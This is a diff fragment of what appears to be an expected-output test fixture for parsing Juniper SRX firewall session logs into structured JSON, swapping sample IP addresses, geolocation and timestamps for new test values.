[junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", "action": "flow_close", @@ -1044,7 +995,7 @@ "port": 53, "bytes": 136, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1052,29 +1003,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 136, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 1 }, "rule": { @@ -1083,29 +1028,23 @@ "source": { "nat": { "port": 11152, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 52890, "bytes": 72, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 1 }, "juniper": { @@ -1148,7 +1087,7 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.14" ] }, "client": { @@ -1158,13 +1097,13 @@ "port": 52890, "bytes": 72, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066069947Z", - "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason=\"idle Timeout\" source-address=\"89.160.20.112\" source-port=\"52890\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"11152\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707045Z", + "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", "action": "flow_close", @@ -1188,7 +1127,7 @@ "port": 53, "bytes": 116, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1196,29 +1135,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 116, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 1 }, "rule": { @@ -1275,7 +1208,7 @@ "related": { "ip": [ "192.168.255.2", - "89.160.20.112", + "67.43.156.15", "192.168.0.47" ] }, @@ -1291,8 +1224,8 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066072111Z", - "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707054600Z", + "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", "action": "flow_close", @@ -1403,8 +1336,8 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066074485Z", - "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.707064800Z", + "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": "2015-09-25T14:19:53.846Z", "action": "flow_close", @@ -1426,7 +1359,7 @@ "port": 21 }, "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1434,28 +1367,22 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "rule": { "name": "General-Outbound" @@ -1463,22 +1390,22 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "juniper": { "srx": { @@ -1513,8 +1440,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1522,12 +1449,12 @@ "port": 14406 }, "port": 3129, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066087269Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707069700Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", "category": [ @@ -1549,7 +1476,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1557,29 +1484,23 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, "bytes": 0, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 0 }, "rule": { @@ -1588,24 +1509,24 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, "bytes": 48, - "packets": 1, - "ip": "81.2.69.193" + "ip": "192.168.224.30", + "packets": 1 }, "juniper": { "srx": { @@ -1642,8 +1563,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1653,13 +1574,13 @@ "port": 3129, "bytes": 48, "packets": 1, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-06T12:25:20.066091197Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707074200Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_started", @@ -1683,7 +1604,7 @@ "port": 21, "bytes": 104, "packets": 2, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1691,29 +1612,23 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, "bytes": 104, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 2 }, "rule": { @@ -1722,24 +1637,24 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, "bytes": 144, - "packets": 3, - "ip": "81.2.69.193" + "ip": "192.168.224.30", + "packets": 3 }, "juniper": { "srx": { @@ -1778,8 +1693,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1789,13 +1704,13 @@ "port": 3129, "bytes": 144, "packets": 3, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066093892Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"application failure or action\" source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707078Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_close", @@ -1819,7 +1734,7 @@ "port": 80, "bytes": 686432, "packets": 584, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1827,24 +1742,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 686432, - "packets": 584, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 584 }, "rule": { "name": "permit-all" @@ -1852,23 +1767,23 @@ "source": { "nat": { "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33040, "bytes": 19592, - "ip": "81.2.69.193", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -1919,7 +1834,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -1929,13 +1845,13 @@ "port": 33040, "bytes": 19592, "packets": 371, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066096116Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"81.2.69.193\" source-port=\"33040\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"81.2.69.193\" nat-source-port=\"33040\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707084500Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", "action": "flow_started", @@ -1957,7 +1873,7 @@ "port": 80 }, "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1965,22 +1881,22 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "rule": { "name": "permit-all" @@ -1988,25 +1904,25 @@ "source": { "nat": { "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33040, "user": { "name": "user1" }, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2054,7 +1970,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2062,12 +1979,12 @@ "port": 33040 }, "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066098330Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address=\"81.2.69.193\" source-port=\"33040\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"81.2.69.193\" nat-source-port=\"33040\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707095700Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", "category": [ @@ -2089,7 +2006,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2097,24 +2014,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2122,23 +2039,23 @@ "source": { "nat": { "port": 48873, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "81.2.69.193", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2188,7 +2105,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2198,13 +2116,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": 